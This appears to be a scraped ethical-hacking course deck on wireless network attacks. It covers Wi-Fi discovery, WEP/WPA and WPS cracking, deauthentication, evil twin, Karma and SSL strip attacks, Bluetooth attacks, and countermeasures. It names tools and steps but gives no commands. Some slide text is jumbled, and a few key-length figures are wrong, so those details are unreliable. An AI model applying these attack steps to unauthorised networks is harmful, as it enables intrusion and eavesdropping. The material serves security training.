Professional Documents
Culture Documents
14 Ceh Hacking Wireless Networks
14 Ceh Hacking Wireless Networks
Wireless Networks
Hacking Wireless
Networks
• Understand Wireless Concepts
Goals • Understand Wireless Encryption Algorithms
• Understand Wireless Threats
• Understand Wireless Hacking
Methodologies
• Learn Wireless Hacking Tools
• Understand Bluetooth Hacking Techniques
• Understand Countermeasures to Wireless
Hacking
• Learn Wireless Security Tools
• Understand Wireless Penetration Testing
Module 14.0 Hacking Wireless Networks
• 14.1 Wireless Concepts
• 14.2 Wireless Discovery and Mapping
• 14.3 Wi-Fi Sniffers
• 14.4 Wi-Fi Attacks
• 14.5 Wi-Fi Cracking
• 14.6 Wireless Hacking Tools
• 14.7 Bluetooth Hacking
• 14.8 Wireless Hacking Countermeasures
• 14.9 Wireless Security Tools
• 14.10 Wireless Penetration Testing
14.1 Wireless
Concepts
Wireless Network Basics
• Wireless Local Area Networks (WLAN)
• Based on the IEEE 802.11 standard
• Uses radio channels for communication
• Devices connect to the network via a wireless network access point
• Advantages
• Disadvantages
Wireless Network Advantages and
Disadvantages
• Advantages
• Fast, easy installation
• Easy connectivity where cables can’t easily be used
• Internet access from anywhere in range of access point
• Free internet connections in many public places
• Disadvantages
• Security is a concern
• The more devices on the network the more bandwidth is compromised
• Enhancements may need new wireless access points and/or wireless cards
• Wi-Fi networks can be disrupted by some electronic equipment
Wireless Terminology
• GSM • Orthogonal Frequency-division
• Bandwidth Multiplexing (OFDM)
• BSSID • Direct-sequence Spread Spectrum
(DSSS)
• ISM Band
• Frequency-hopping Spread
• Access Point Spectrum (FHSS)
• Hotspot
• Association
How are Wired and Wireless Networks
Different?
• Most wired exploits will also work against Wi-Fi wireless
• Sniffing
• Spoofing
• MITM/Hijacking
• Deauthentication
• DoS
• There are additional wireless LAN network technologies that have their
own vulnerabilities
• RFID
• NFC
• Bluetooth
• Cellular
Wireless Network Types
• Extended to Wired Network
• LAN-to-LAN Wireless Network
• Multiple Access Points
• 3G/4G Hotspot
Accessing Wireless Networks
• 802.11a
• 802.11b
• 802.11g
• 802.11i
• 802.11n
• 802.11ac
• 802.16 (WiMAX)
• 802.15 (Bluetooth)
Service Set Identifier (SSID)
• A token used to identify a 802.11 network
• A single, shared identifier located between client and access point
• SSID is continuously broadcast from SSID
• SSID consists of text that is human-readable
• SSID on each host must be reconfigured when network SSID is changed
• Clients can use non-secure access mode to access blank, configured, or
“any” SSID
• Default values must be changed to ensure security
• SSID is secret on closed networks
Authentication Modes for Wi-Fi
• Open-System Authentication Process
• No key
• Shared-Key Authentication Process
• Password is set on WAP and clients
• 802.1x
• Typically the WAP is open
• DHCP lease
• Client browser opens/is redirected to a captive portal
• Sometimes other protocols are permitted even if browser can’t connect
• Login sent to a RADIUS/TACACS/TACACS+ server
• Client caches short-term session token
Wi-Fi Chalking
• WarWalking: Attackers on foot use Wi-Fi-enabled laptops to identify
open networks
• WarChalking: Drawing symbols in public areas to indicate open
networks
• WarFlying: Attackers use drones to identify open networks
• WarDriving: Attackers use a vehicle to move around with Wi-Fi-
enabled laptops and identify open networks
Wi-Fi Chalking Symbols
• Free Wi-Fi
• Wi-Fi with WEP
• Wi-Fi with MAC Filtering
• Wi-Fi with Multiple
Access Controls
• Restricted Wi-Fi
• Wi-Fi with Closed SSID
• Pay for Wi-Fi
• Wi-Fi Honeypot
Wireless Network Antennas
• Directional antenna
• Omnidirectional antenna
• Parabolic Grid antenna
• Yagi antenna
• Dipole antenna
14.2 Wireless
Discovery and
Mapping
Wireless Discovery
• Attackers must first discover and footprint a wireless network
• Active or Passive Footprinting a wireless network
• Finding a wireless network:
• Attacker will first check all potential networks
• Attacker will move around with wireless laptop to find active networks
Wireless Discovery Tools
• inSSIDer • iStumbler
• NetSurveyor • WiFinder
• Vistumbler • Wellenreiter
• NetStumbler • AirCheck Wi-Fi Tester
• WirelessMon • AirRaider 2
• Kismet • Xirrus Wi-Fi Inspector
• WiFi Hopper • WiFi Finder
• Wavestumbler • WeFi
InSSIDer Example
Mobile Wireless Discovery Tools
• WiFiFoFum-WiFi Scanner
• WiFi Manager
• Network Signal Info
• OpenSignal Maps
• Fing
• Overlook WiFi
GPS Mapping
• Attacker makes map and database of Wi-Fi networks
• Uses GPS to track Wi-Fi network location and uploads coordinates to
site
• Attackers share or sell information
GPS Mapping Tools
• WiGLE
• Skyhook
• TamoGraph
• WiFi Site Survey
• Fluke Airmagnet
14.3 Wi-Fi
Sniffers
Wireless Traffic Analysis
• Find Vulnerabilities
• Do Wi-Fi Reconnaissance
• Use Tool to Conduct Analysis
• Select the appropriate card/chipset
Wireless Sniffing
• Use sniffers like Wireshark to obtain signals that
traverse the air
• Interface will by default receive transmissions
bound for it
• Put interface in promiscuous mode to capture all
available transmissions
• Sniffing can enable eavesdropping on
communications
• More viable in open Wi-Fi
• Encryption largely mitigates problems
• Some information is sent in cleartext despite
encryption modes, such as MAC address
• Use MAC address in spoofing attacks
Wireless Sniffing (cont’d)
WPS is an attempt to Clients use 8-digit PIN to Lockout policies can hamper
streamline Wi-Fi connect. PIN cracking online
setup/device enrollment
Each PIN half is calculated Might take a couple weeks, but
separately still feasible
Only 11,000 possible values Lockout may look for MAC
Easy to crack within hours address, so spoofing could be
used to bypass
Brute forcing may trigger DoS on
certain WAPs
WPS Exploits
Cracking Wireless Encryption – WPA/WEP
Cracking Tools
• Aircrack-ng • Portable Penetrator
• Besside-ng • CloudCracker
• KisMAC • coWPAtty
• Cain & Abel • Wifite
• Elcomsoft Wireless Security Auditor • WepCrackGui
• WepAttack • Penetrate Pro
• Wesside-ng • Fern WiFi Cracker
• Reaver Pro
• WEPCrack
• WepDecrypt
WPS Reaver Attack Example
14.6 Wireless
Hacking Tools
Sniffers
• Kismet
• Wireshark
• Airodump-ng
• Vericode
• Monitis
Wardriving Tools
• Airbase-ng
• ApSniff
• WiFiFoFum
• MiniStumbler
• WarLinux
• MacStumbler
• WiFi-Where
• AirFart
• AirTraf
• 802.11 Network Discover Tools
Monitors
• NetworkManager
• KWiFiManager
• NetworkControl
• Sentry Edge II
• WaveNode
• xosview
• RF Monitor
• DTC-340 RFXpert
• RF Explorer
• Home Curfew RF Monitoring System
• SigMon
Analyzer Tools
• AirMagnet WiFi Analyzer
• OptiView XG Network Analysis Tablet
• Observer
• Ufasoft Snif
• vxSniffer
• OneTouch AT Network Assistant
• Capsa Network Analyzer
• SoftPerfect Netowrk Protocol Analyzer
• OmniPeek Network Analyzer
• CommView for WiFi
Packet Capturing Tools
• WirelessNetView
• Tcpdump
• Airview
• RawCap
• Airodump-ng
Spectrum Analysis Tools
• Cisco Spectrum Expert
• AirMedic USB
• AirSleuth-Pro
• BumbleBee-LX Spectrum Analyzer
• Wi-Spy
MITM / Evil Twin Tools
• Karma
• Wi-Fi Pumpkin
• Wi-Fi Pineapple
Mobile Hacking Tools
• WiHack
• Backtrack Simulator
• Wps Wpa Tester
14.7 Bluetooth
Hacking
Bluetooth Modes
• Discoverable Modes:
• Discoverable
• Limited Discoverable
• Non-discoverable
• Pairing Modes
• Non-pairable
• Pairable
Bluetooth Threats
• Leaking Personal Information
• Controlling Device Remotely
• Device Bugging
• Social Engineering
• Sending False SMS Messages
• Introduction of Malicious Code
• Hiking Up Phone Bill Causing Financial Stress
• Taking Advantage of Vulnerabilities in Protocols
Bluetooth Attacks
• Bluejacking
• Sending unsolicited messages to Bluetooth-enabled devices
• Bluesnarfing
• Unauthorized information access on a device
• Bluebugging
• Unauthorized system access to a device
• BlueBorne
• Collection of overflow attacks that could result in arbitrary code execution
• Pairing and discoverability are not required on the target
• Requires no user interaction
Bluesnarfing Example
Bluetooth Attacks (cont’d)
• Bluesmacking
• DoS
• BluePrinting
• Remotely discover details about Bluetooth enabled devices
• MAC Spoofing Attack
• Man-in-the-Middle/Impersonation Attack
Bluetooth Hacking Tools
• PhoneSnoop • CIHwBT
• BlueScanner • BT Audit
• BH BlueJack • Blue Alert
• Bluesnarfer • Blue Sniff
• btCrawler
• Bluediving
• Blooover II
• btscanner
14.8 Wireless
Hacking
Countermeasures
Defending Against Bluetooth Hacking
• Ensure PIN keys use non-regular patterns
• Ensure device is always in hidden mode
• Keep track of all past paired devices and delete suspicious devices
• Ensure BT is kept disabled unless required
• Never accept pairing requests from unknown devices
• Ensure encryption is enabled when connecting to a PC
Defending Against Bluetooth Hacking (cont’d)
• Keep device network range at its lowest
• Only pair with other devices in a secure area
• Ensure antivirus is installed
• Ensure default security settings are changed to the best possible
standard
• Ensure all BT connections use Link Encryption
• Ensure encryption is empowered for multiple wireless
communications
Wireless Security Layers
• Connection Security
• Wireless Signal Security
• Device Security
• End-user Protection
• Data Protection
• Network Protection
Defending Against Wireless Attacks
Configuration Best Practices:
• Ensure default SSID is changed once WLAN is configured
• Ensure remote router login is disabled
• Ensure router access password is set and firewall protection is
enabled
• Ensure MAC Address filtering is enabled on routers/access points
• Ensure SSID broadcasts are disabled at access points and passphrase
is changed frequently
Defending Against Wireless Attacks (cont’d)
SSID Settings Best Practices:
• Always use SSID cloaking
• Keep passphrases free of SSID, network/company name, or anything
that is easy to figure out
• Ensure there is a firewall/packet filter between AP and Intranet
• Keep wireless network strength low enough avoid detection outside
organization
• Regularly ensure there are no issues with setup/configuration
• Use extra traffic encryption
Defending Against Wireless Attacks (cont’d)
Authentication Best Practices:
• Use WPA instead of WEP
• Ensure access points are in secure locations
• Use WPA2 if possible
• Ensure all wireless drivers are up-to-date
• Ensure network is disabled when it isn’t needed
• Ensure authentication via a centralized server
14.9 Wireless
Security Tools
Wireless Security Auditing Tools
• AirMagnet WiFi Analyzer
• Motorola’s AirDefense Services Platform (ADSP)
• Adaptive Wireless IPS
• Aruba RFProtect
Wireless Intrusion Prevention Systems
• Extreme Networks Intrusion Prevention System
• AirMagnet Enterprise
• Dell SonicWALL Clean Wireless
• HP TippingPoint NX Platform NGIPS
• AirTight WIPS
• Network Box IDP
• AirMobile Server
• Wireless Policy Manager (WPM)
• ZENworks Endpoint Security Management
• FortiWiFi
Wireless Predictive Planning Tools
• AirMagnet Planner
• Cisco Prime Infrastructure
• AirTight Planner
• LANPlanner
• RingMaster
• Connect EZ Predictive RF CAD Design
• Ekahau Site Survey (ESS)
• ZonePlanner
• Wi-Fi Planning Tool
• TamoGraph Site Survey
Wireless Vulnerability Scanning Tools
• Zenmap
• Nessus
• OSWA-Assistant
• Network Security Toolkit
• Nexpose Community Edition
• WiFish Finder
• Penetrator Vulnerability Scanning Appliance
• SILICA
• WebSploit
• Airbase-ng
Bluetooth Security Tools
• No automatic pairing
• Turn off discovery
• Bluetooth Firewall
Mobile Wi-Fi Security Tools
• WiFi Protector
• WiFiGuard
• Wifi Inspector
14.10 Wireless
Penetration
Testing
Steps to Penetration Testing Wireless
• Discover WAPs with Airmon-ng
• Query WAPs for protocols
• Use directional antennas for better signal gain
• Use Wireshark to capture unencrypted traffic
• Use Aircrack-ng suite, Fern Wi-Fi, or Bessiden-ng to crack WEP, WPA,
WPA2
• Use Karma for MITM attacks
• Use Reaver/Pixie Dust to crack WPS
• Use social engineering/evil twins to capture user passwords wirelessly
• IEEE 802.11 Wi-Fi networks used for data
transfer/communication across radio network
• Wi-Fi infrastructure made of software and
hardware
Wireless • Most used encryption WPA, WPA2, and WEP –
Hacking WPA2 most secure
• WEP uses 24-bit IV, stream cipher RC4, and
Review CRC-32 checksum
• WPA uses TKIP, stream cipher RC4 128-bit and
62-bit keys; WPA2 uses 256-bit key with AES
encryption
• WEP is vulnerable to analytical attacks
• Countermeasures to Wi-Fi attack are wireless
IDS systems and best practices for
configuration, SSID, and authentication
Penetrating Wireless
Networks Review
• Use aircrack-ng to crack keys on Wi-Fi
networks secured with WEP
• Use a replay attack to obtain a repeated
24-bit IV
• Speed up WEP cracking with a
fragmentation attack using aireplay-ng
• Use the PRGA obtained from fragmentation
to craft a packet with packetforge-ng
• Send a crafted packet to an AP to easily
obtain thousands of IVs
• Check the laws in your area before using
radio jamming devices
Penetrating Wireless
Networks Review (cont’d)
• Use a tool like aireplay-ng to knock clients off a
WAP
• Spoof MAC addresses in deauthentication
attacks
• Use evil twins to entice users to connect to
your rogue AP
• Use Karma attacks by sending a probing
request to trick client into connecting to evil
twin
• Use SSL strip with evil twin to downgrade a
user's HTTPS session
• Place your wireless interface in promiscuous
mode to receive all available signals
• Use airodump-ng to sniff four-way wireless
handshake for WPA/WPA2 key cracking
Penetrating Wireless
Networks Review (cont’d)